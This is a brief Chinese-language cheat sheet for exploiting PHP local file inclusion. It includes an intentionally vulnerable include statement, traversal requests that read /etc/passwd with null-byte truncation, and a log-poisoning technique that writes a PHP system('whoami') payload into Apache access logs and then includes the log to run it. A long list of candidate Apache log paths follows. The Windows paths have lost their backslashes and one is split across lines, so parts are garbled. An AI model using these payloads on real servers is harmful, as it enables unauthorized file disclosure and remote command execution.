代码:
<?php include($_GET['for'].‘.php’);//用于测试本地包含漏洞 ?>
Linux
test.php?for=/etc/passwd%00
Win
test.php?for=D:
eadme.txt%00
Log Injection
访问任意页面payload,将payload写入到log中,然后包含log文件执行payload。
test.php?<php%20system('whoami');?>
DoFuck
//linux test.php?for=/var/log/apache/logs/access_log%00 //win test.php?for=..apachelogsaccess.log%00
可能的log路径
/etc/httpd/logs/access.log /etc/httpd/logs/access_log /etc/httpd/logs/error.log /etc/httpd/logs/error_log /opt/lampp/logs/access_log /opt/lampp/logs/error_log /usr/local/apache/log /usr/local/apache/logs /usr/local/apache/logs/access.log /usr/local/apache/logs/access_log /usr/local/apache/logs/error.log /usr/local/apache/logs/error_log /usr/local/etc/httpd/logs/access_log /usr/local/etc/httpd/logs/error_log /usr/local/www/logs/thttpd_log /var/apache/logs/access_log /var/apache/logs/error_log /var/log/apache/access.log /var/log/apache/error.log /var/log/apache-ssl/access.log /var/log/apache-ssl/error.log /var/log/httpd/access_log /var/log/httpd/error_log /var/log/httpsd/ssl.access_log /var/log/httpsd/ssl_log /var/log/thttpd_log /var/www/log/access_log /var/www/log/error_log /var/www/logs/access.log /var/www/logs/access_log /var/www/logs/error.log /var/www/logs/error_log C:apachelogsaccess.log C:apachelogserror.log C:Program FilesApache GroupApachelogsaccess.log C:Program FilesApache GroupApachelogserror.log C:program fileswampapache2logs C:wampapache2logs C:wamplogs C:xamppapachelogsaccess.log C:xamppapachelogserror.log
参考:http://downloads.ackack.net/LocalFileInclusion.pdf